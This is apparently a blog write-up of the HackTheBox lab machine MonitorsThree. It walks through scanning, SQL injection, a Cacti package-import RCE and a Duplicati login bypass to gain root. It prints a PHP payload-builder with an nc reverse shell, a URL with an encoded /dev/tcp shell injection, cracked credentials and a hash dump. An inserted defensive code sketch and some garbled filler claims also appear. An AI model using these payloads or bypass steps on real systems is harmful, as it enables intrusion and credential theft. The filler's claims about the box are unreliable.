Key Highlights
- Explore the unique challenges and rewards of conquering MonitorsThree on HackTheBox.
- Discover the essential tools and skills needed to navigate through the challenges and acquire the user flag.
- Gain insights into what sets MonitorsThree apart on HackTheBox and how it stands out in terms of difficulty and complexity.
- Learn about the significance of effective enumeration techniques for success in tackling MonitorsThree.
- Understand whether beginners can successfully overcome the hurdles presented by MonitorsThree and emerge victorious in this Capture The Flag (CTF) environment.
Introduction
MonitorsThree on HackTheBox is a challenging machine that pushes your skills to the limit. As a beginner, mastering MonitorsThree can be both daunting and rewarding. This blog will guide you through the essential steps to conquer this machine, using techniques such as hacking and penetration testing. Get ready to dive into the world of CTF challenges and sharpen your hacking abilities. Let’s explore the intricacies of MonitorsThree and uncover the strategies to successfully hack it. Stay tuned for expert tips and tricks to grab that elusive user flag. Good luck on your hacking journey!
Understanding the Basics of MonitorsThree
MonitorsThree is a challenging platform on HackTheBox, requiring a deep understanding of NLP concepts. To conquer MonitorsThree, familiarity with pwn, rce, and CTF methodologies is essential. This blog guides users on navigating the intricacies of MonitorsThree, emphasizing the significance of honing application-specific skills. Mastery of these tools and techniques is crucial for successfully obtaining the user flag. Embrace the learning journey towards mastering MonitorsThree and excelling in the thrilling world of ethical hacking.
What Makes MonitorsThree Unique on HackTheBox?
MonitorsThree stands out on HackTheBox due to its intricate challenges and emphasis on advanced enumeration techniques. Its blend of cryptography, steganography, and reverse engineering makes it a favorite among seasoned hackers.
Essential Tools and Skills Needed
To tackle MonitorsThree on HackTheBox successfully, aspiring individuals must equip themselves with a range of essential tools and skills. Proficiency in exploiting vulnerabilities, understanding reverse engineering, and familiarity with privilege escalation techniques are paramount. Dexterity in using tools like IDA Pro, Ghidra, Burp Suite, and Metasploit significantly enhances one’s capability to conquer MonitorsThree. Mastering scripting languages such as Python and Bash proves invaluable for automating tasks and executing exploits efficiently. These competencies serve as the foundation for a successful endeavor in the realm of cybersecurity challenges.
NMap Scanning
I used Nmap to perform a thorough scan to search for open ports and services:
nmap -sC -sV -oN monitorsthreescan.txt 10.10.11.30

The scan detected two open ports: port 22, running OpenSSH 8.9p1 on Ubuntu Linux, and port 80, serving HTTP content via nginx 1.18.0, which was redirected to http://monitorsthree.htb. Additionally, port 8000 was found open with a SimpleHTTPServer 0.6, indicating a Python-based service. A range of ports were noted as filtered, including those for metagram, sco-sysmgr, spamassassin, and various others. The host appears to be a Linux system, with no other open or discernible services beyond those mentioned.
After visiting the website, we can see that it's written in PHP:

admin is an endpoint, also admin/navbar.php. admin is also a username, confirmable by the password reset option.
Subdomain Enumeration
As HTTP was open, I enumerated subdomains with FFUF:

Found a subdomain: http://cacti.monitorsthree.htb/cacti/. Added it to hosts file.

I also found the following:
http://cacti.monitorsthree.htb/cacti/include/vendor/csrf/csrf-secret.php
http://cacti.monitorsthree.htb/cacti/cmd_realtime.php?1+1&&%3b0%3C%26196%3Bexec%20196%3C%3E%2Fdev%2Ftcp%2F10.10.11.30%2F1674%3B%20sh%20%3C%26196%20%3E%26196%202%3E%26196
SQL Injection on Domain
Next, I targeted the main subdomain and discovered an SQL Injection vulnerability in the forgot_password.php page. To streamline the exploitation process, I utilized SQLMap, which proved to be time-consuming due to the complexity of the vulnerability.
sqlmap -u "http://10.10.11.30/forgot_password.php"  # use flags --level, --risk and --batch

After a bit of digging around the output of SQLMap, I found out the creds of cacti and the main domain: admin:greencacti2001


Cacti RCE Vulnerability Exploitation
With the credentials obtained from SQLMap, I accessed the Cacti subdomain and identified a Remote Code Execution (RCE) vulnerability in Cacti during package import (CVE-2024-25641). Using the Metasploit module exploit/multi/http/cacti_package_import_rce, you'll be able to land a shell as www-data.
This got me a shell: https://github.com/rapid7/metasploit-framework/pull/19196
<?php
$xmldata = "<xml>
<files>
<file>
<name>root/rce.php</name>
<data>%s</data>
<filesignature>%s</filesignature>
</file>
</files>
<publickey>%s</publickey>
<signature></signature>
</xml>";
$filedata = "<?php shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.27 4444 >/tmp/f'); ?>";
$keypair = openssl_pkey_new();
$public_key = openssl_pkey_get_details($keypair)["key"];
openssl_sign($filedata, $filesignature, $keypair, OPENSSL_ALGO_SHA256);
$data = sprintf($xmldata, base64_encode($filedata), base64_encode($filesignature), base64_encode($public_key));
openssl_sign($data, $signature, $keypair, OPENSSL_ALGO_SHA256);
file_put_contents("shutup.xml", str_replace("<signature></signature>", "<signature>".base64_encode($signature)."</signature>", $data));
system("cat shutup.xml | gzip -9 > shutup.xml.gz; rm shutup.xml");
?>
Now, save it as shell.php and run it using ‘php shell.php’. Upload the shell uploaded using nc. Exploit at
http://cacti.monitorsthree.htb/cacti/resource/shell.php
Digging around a bit, found ‘marcus’ has a user account in cacti.
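Defensive note on the package script above, as an added example that is not part of the original write-up and is not Cacti's code: the script generates its own key pair and ships the public key inside the package, so a check against that embedded key passes for any signer. The Node.js sketch below (key names, install root and the `scripts` directory are assumptions, all sample data is constructed) contrasts that check with one that pins the publisher key and confines the file name to an allowed directory.

```javascript
const crypto = require('crypto');
const path = require('path');

// Constructed keys: "publisher" is the key the importer pins out of band,
// "stranger" is any key pair generated by whoever built the package.
const newKey = () => crypto.generateKeyPairSync('rsa', { modulusLength: 2048 });
const publisher = newKey();
const stranger = newKey();
const pem = (k) => k.publicKey.export({ type: 'spki', format: 'pem' });

// Parsed form of one <file> entry plus the package-level <publickey>.
function buildPackage(signer, name, body) {
  const data = Buffer.from(body);
  return {
    name,
    data: data.toString('base64'),
    filesignature: crypto.sign('sha256', data, signer.privateKey).toString('base64'),
    publickey: pem(signer),
  };
}

const sigValid = (pkg, keyPem) => crypto.verify('sha256',
  Buffer.from(pkg.data, 'base64'), keyPem, Buffer.from(pkg.filesignature, 'base64'));

// Weak: the key comes from the package, so every self-signed package passes.
const verifyEmbedded = (pkg) => sigValid(pkg, pkg.publickey);

// Hardened: ignore pkg.publickey, use the pinned key, and keep the write
// target inside one allowed directory under the install root.
function verifyPinned(pkg, pinnedPem, installRoot, allowedDir) {
  if (!sigValid(pkg, pinnedPem)) return { ok: false, reason: 'not signed by pinned key' };
  const base = path.resolve(installRoot, allowedDir) + path.sep;
  const target = path.resolve(installRoot, pkg.name);
  if (!target.startsWith(base)) return { ok: false, reason: 'path outside allowed directory' };
  return { ok: true, target };
}

function demo() {
  const pinned = pem(publisher);
  const selfSigned = buildPackage(stranger, 'root/rce.php', '<?php /* constructed */ ?>');
  const traversal = buildPackage(publisher, 'scripts/../../tmp/x.sh', 'echo constructed');
  const good = buildPackage(publisher, 'scripts/check.sh', 'echo constructed');
  const run = (p) => verifyPinned(p, pinned, '/var/www/app', 'scripts');
  return { embedded: verifyEmbedded(selfSigned), selfSigned: run(selfSigned),
           traversal: run(traversal), good: run(good) };
}

console.log(demo());
```

The self-signed package passes the embedded-key check but fails the pinned one, and a correctly signed package is still rejected when its file name resolves outside the allowed directory.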
User Flag
Port forwarding gets us the port 8200. There is a login page at http://127.0.0.1:8200/login.html
Once you gain access as the user Marcus, there is a port that can be accessed using the command: ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 -i sessions/id_rsa_marcus
Marcus public key:
Password hashes (Marcus's was cracked):
MariaDB [monitorsthree_db]> select * from users
-> ;
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
| id | username | email | password | name | position | dob | start_date | salary |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
| 2 | admin | admin@monitorsthree.htb | 31a181c8372e3afc59dab863430610e8 | Marcus Higgins | Super User | 1978-04-25 | 2021-01-12 | 320800.00 |
| 5 | mwatson | mwatson@monitorsthree.htb | c585d01f2eb3e6e1073e92023088a3dd | Michael Watson | Website Administrator | 1985-02-15 | 2021-05-10 | 75000.00 |
| 6 | janderson | janderson@monitorsthree.htb | 1e68b6eb86b45f6d92f8f292428f77ac | Jennifer Anderson | Network Engineer | 1990-07-30 | 2021-06-20 | 68000.00 |
| 7 | dthompson | dthompson@monitorsthree.htb | 633b683cc128fe244b00f176c8a950f5 | David Thompson | Database Manager | 1982-11-23 | 2022-09-15 | 83000.00 |
+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+
Marcus password: 12345678910
Bypassing Duplicati auth: https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee
Private key of Marcus
For those having trouble bypassing Duplicati authentication:
- In Burp, intercept the login request, forward it, and copy the session_nonce to the noncedpwd command.
- Substitute the result as the password, forward the request, and then disable intercept.
To get a shell as root:
- Generate SSH keys on your machine and copy the public key to a folder on the target box as authorized_keys.
- In Duplicati, create a backup of this file and restore it to /root/.ssh/.
- You should now be able to log in with the generated key as root.
Root Flag with privesc
- Create a Tunnel: Establish a tunnel from the target machine (Casino) to your local machine using SSH:
  ssh -i id_rsa marcus@10.10.11.30 -D 8300
  Configure your browser to use port 8300 as a proxy. This will give access to a site running on 127.0.0.1:8200, which is Duplicati.
- Extract the Duplicati Configuration File: On the target machine, navigate to /opt/duplicati/config and locate the Duplicati-server.sqlite file. Use scp to transfer the file to your machine and open it with SQLite Browser.
- Retrieve the Passphrase: In the Option table, find the server-passphrase value. Convert this value from Base64 to Hex.
- Sync Time with the Target Machine: Ensure your machine's time matches the target machine's time to avoid issues with the CSRF token:
  sudo timedatectl set-time xx:xx:xx
- Bypass Authentication:
  - Start Burp and set Intercept to capture requests.
  - Attempt to log in to Duplicati with any password.
  - Inspect the POST request, forward it once, and examine the response to locate the NONCE value.
  - Copy the NONCE value in plain text (do not convert it).
- Generate the Nonce Password:
  - Open the developer console in your browser and execute the following JavaScript:
    var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('value_of_NONCE') + 'value_of_hex_server_passphrase')).toString(CryptoJS.enc.Base64);
  - Print noncedpwd in the console and copy the resulting value.
- Login with the Generated Nonce Password:
  - In the next request in Burp, replace the password field with your noncedpwd value.
  - Highlight it, convert it to a URL, and press CTRL+U.
  - Forward the request without intercepting further; you should now be logged in to Duplicati.
- Create Backup and Extract Files:
  - On the target machine (Casino), create two directories, e.g., dest and result, within Marcus's folder.
  - In Duplicati, create a new backup task with any name and description, and ensure no encryption is set.
  - Set the destination folder to /source/home/marcus/dest and the target to /source/root/root.txt.
  - After creating the task, refresh the Duplicati home page if needed to see the new backup task, then run it.
  - Check /home/marcus/dest for .zip files on the Casino machine.
- Restore the Backup:
  - In Duplicati, select the backup to restore, and set the destination to /source/home/marcus/result.
  - After the restore, check /home/marcus/result on the target machine, where you should find root.txt.
Conclusion
In conclusion, mastering MonitorsThree on HackTheBox requires honing your skills in hacking methodologies. With the right tools, such as exploit frameworks for remote code execution (RCE) and privilege escalation techniques, you can efficiently conquer challenges. Remember, the essence of Capture The Flag (CTF) events like HackTheBox lies in persistent learning and hands-on practice to enhance your prowess in the realm of application security. Stay curious, keep exploring, and never cease to grow in your journey as a cybersecurity enthusiast.
Frequently Asked Questions
How Do I Start with MonitorsThree on HackTheBox?
To start with MonitorsThree on HackTheBox, create an account on the platform, access the machine, and begin by enumerating services. Utilize tools like Nmap for scanning and enumeration to uncover vulnerabilities. Research and understand the specific challenges of MonitorsThree to progress effectively.
What Are Common Challenges in MonitorsThree?
MonitorsThree poses challenges such as intricate network configurations, advanced privilege escalation techniques, and complex cryptography puzzles. Overcoming these hurdles requires a deep understanding of cybersecurity concepts and the ability to think outside the box.
Can Beginners Successfully Conquer MonitorsThree?
Beginners can conquer MonitorsThree on HackTheBox with dedication and learning. By understanding the unique challenges it presents, acquiring essential tools and skills, success is within reach for those starting out in cybersecurity.
Tips for Effective Enumeration in MonitorsThree?
To effectively enumerate in MonitorsThree on HackTheBox, focus on thorough port scanning using tools like Nmap, enumerate services for vulnerabilities, and explore directories with DirBuster. Practice active enumeration techniques to uncover hidden paths and potential weaknesses.









I followed the instructions verbatim and it can’t find the php file no matter what I do.
Will re-check. Thanks